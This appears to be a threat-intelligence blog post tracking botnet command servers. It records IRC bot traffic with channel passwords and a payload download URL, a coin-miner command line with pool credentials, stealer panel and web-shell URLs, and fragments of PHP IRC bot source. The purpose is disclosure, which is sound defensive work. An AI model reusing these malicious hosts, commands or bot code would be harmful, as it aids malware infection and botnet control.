Resolved : [xxxd2.com] To [199.168.140.38]
Remote Host  Port Number
173.192.224.115 80
199.15.234.7 80
199.168.140.38 7777
PASS Eshuxx
NICK n{US|XPa}evkfwgc
USER evkfwgc 0 0 :evkfwgc
JOIN #eshu Eshuxx
PRIVMSG #eshu :[d="http://www.fotosprivadas.com/chicas/update/Ruco.exe" s="172032 bytes"] Updated bot file "C:\Documents and Settings\UserName\Application Data\Scxaxs.exe" - Download retries: 0
Sample
hosting infos: http://whois.domaintools.com/199.168.140.38
new.pusikuracbre.me(CoinMiner hosted in Russian Federation Selectel Ltd.)
From same lamer here http://www.exposedbotnets.com/search?q=8332
Sample Sample Sample
Resolved : [new.pusikuracbre.me] To [31.186.102.181]
Resolved : [new.pusikuracbre.me] To [31.186.102.180]
Resolved : [new.pusikuracbre.me] To [31.186.102.155]
Running process: miner.exe -a 60 -g no -o http://new.pusikuracbre.me:8332/ -u d38a39ys_l3kpy -p el29djggss
Xandora results here
hosting infos: http://whois.domaintools.com/31.186.102.180
75.77.40.195(ngrBot hosted in United States Greenville Windstream Nuvox Inc)
Remote Host  Port Number
199.15.234.7 80
75.77.40.195 6668
PASS ngrBot
PRIVMSG #asiksi# :[DNS]: Blocked "windowsupdate.microsoft.com"
NICK n{US|XPa}vxpwwmw
USER vxpwwmw 0 0 :vxpwwmw
JOIN #asiksi# asdr3ny
PRIVMSG #asiksi# :[DNS]: Blocked "www.microsoft.com"
PRIVMSG #asiksi# :[DNS]: Blocked "microsoft.com"
PRIVMSG #asiksi# :[DNS]: Blocked "update.microsoft.com"
Now talking in #asiksi#
Topic On: [ #asiksi# ] [ .mod usbi on .mdns www.microsoft.com
www.kavalier2012.ru(UFR Stealer Gate Admin Panel hosted in Latvia Rn Data Sia)
Sample here
UFR Stealer Admin Panel: www.kavalier2012.ru/gate/ufr.php
hosting infos: http://whois.domaintools.com/195.3.146.46
o.ksah4ck.com(irc botnet hosted in United States Ft. Wayne Comcast Business Communications Llc)
Resolved : [o.ksah4ck.com] To [70.88.160.105]
Resolved : [o.ksah4ck.com] To [66.41.211.152]
Remote Host  Port Number
66.41.211.152 3921
NICK [0]USA|XP-SP2[P]552515
USER [0]USA|XP-SP2[P]552515 "localhost" "o.ksah4ck.com" :Notepad.
JOIN #errorz
hosting infos: http://whois.domaintools.com/70.88.160.105
v1.0 Ultimate phpB(Linux bots hosted in Brazil Comite Gestor Da Internet No Brasil)
Albanian hacker using PHP bots to flood IRC channels
#####################################################################
#  v1.0 Ultimate phpB. Enjoy ! ! ! ! !                              #
#                                                                   #
#  Fixed By TiRoNcI_BoY®                                            #
#  Albhack@msn.com                                                  #
#####################################################################
<?
set_time_limit(0);
error_reporting(0);
class pBot {
####################### V1.0 CONFIGURATION ########################
var $config = array("server"=>"189.30.30.10", #
                    "port"=>6667, //server port
                    #
irc.ganyot.us.to(Linux bots hosted in Korea, Republic Of Seoul Hanbiro)
I found this link http://focori.com.br/images/x.php; it was a PHP shell uploaded to a vulnerable site, and inside it I found the bot used for exploiting vulnerable sites.
<?
/*
 *
 * NOGROD. since 2008
 * IRC.UDPLINK.NET
 *
 * COMMANDS:
 *
 * .user <password>   //login to the bot
 * .logout            //logout of the bot
 * .die               //kill the bot
cube.sdeirc.net(ngrBot hosted in Netherlands Amsterdam Ecatel Ltd)
Our anonymous friend pointed out this URL http://cbteam.ws/ (it contains samples). I checked the files and found this botnet, whose IPs I already posted in the blog.
Resolved : [cube.sdeirc.net] To [89.248.166.139]
Remote Host  Port Number
cube.sdeirc.net 7392
PASS none
NICK New{US-XP-x86}1124207
USER 1124207 "" "1124207" :1124207
MODE New{US-XP-x86}1124207 +iMmx
JOIN #a secret
JOIN #rndbot zrag
LilyJade Software (malware downloader hosted in United States Redmond Microsoft Corp)
Got the sample from our anonymous friend, and here is what it does:
1. downloads the file installer.gif
GET /installer.gif?action=started&browser=ie6&ver=1_16_149_149&bic=66583225931340E1B463893B68AD2174IE&app=4761&appver=0&verifier=eb9f1208f7e0fabe1db48c4f79a1fbad&srcid=0&subid=0&zdata=0&ff=1&ch=1&default=X&os=XP&admin=1&type=14337 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: stats.crossrider.com
Connection: Keep-Alive
Cache-Control: no-cache
2. downloads and installs a fake Chrome
The data identified by the following URLs was then requested from the remote web server:
http://o-o.preferred.xo-ord1.v9.lscache2.c.pack.google.com/edgedl/chrome/install/1123.1/chrome_installer.exe?cms_redirect=yes
http://crt.usertrust.com/AddTrustExternalCARoot.p7c
http://app-static.crossrider.com/plugin/apps/4761/plugins/1_16_149_149/ie6/plugins.json?ver=2
http://app-static.crossrider.com/plugin/opensearch/ie/4761.xml
http://cotssl.crossrider.com/plugin/apps/4761/manifest/1_16_149_149/ie6/manifest.xml?ver=0
http://crl.verisign.com/pca3.crl
http://crl.verisign.com/ThawteTimestampingCA.crl